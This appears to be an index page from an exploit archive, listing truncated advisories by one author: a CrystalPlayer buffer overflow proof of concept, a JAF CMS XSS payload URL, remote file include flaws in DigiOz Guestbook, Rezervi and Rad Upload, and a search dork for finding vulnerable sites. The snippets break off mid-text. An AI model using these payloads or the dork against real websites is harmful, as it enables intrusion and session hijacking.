CrystalPlayer 1.98 - '.mls' Local Buffer Overflow

!/usr/bin/perl Crystal Player 1.98 Playlist.mls File Local Buffer Overflow Exploit Source:: http://www.crystalplayer.com/CrystalPro.exe Credit To Timq For The Vulnerability POC By Arham Muhammad While Debugging EIP And EBP Successfully Gets Overwritten! Upon Successful Exploitation, DOS Occurs An...

jafcms-xss.txt

JAF CMS - 4.0 Cross Site Scripting Vulnerability Source: http://sourceforge.net/projects/jaf-cms/ Author: Arham Muhammad POC: http://site/path/index.php?show="alert/xss/; There Is No Sign Of Filteration In Jaf-Cms, Making It Prune To Xss And Session Hijacking!...

digioz-rfi.txt

DigiOz Guestbook 1.7.1 --------------------------- App: DigiOz Guestbook 1.7.1 Source: http://www.digioz.com/guestbook/guestbook.zip Author: Arham Muhammad Dork: "Powered by DigiOz Guestbook Version 1.7.1" Vulnerable File: /admin/deleteprocess.php Vulnerable Code: $id = $GET'id'; This Vulnerabili...

rezervi27-rfi.txt

------=Part10021926781377.1177148481272 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline App: Rezervi Availability 2.7 Source: http://www.rezervi.com/www/german/download/rezerviV27.zip Author: Arham Muhammad Vulnerable File:...

Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

^ Rad Upload Version 3.02 Remote File Include Vulnerability ^ Source: http://www.radinks.com/downloads/raduploadlite.zip ^ Vulnerable C0de On Line 39 In upload.php : ifisset$savepath && $savepath!="" ^ EXploit http://victim/directory/upload.php?savepath=sh3ll? ^ Found3d By: Arham ^ Gr33tz To --...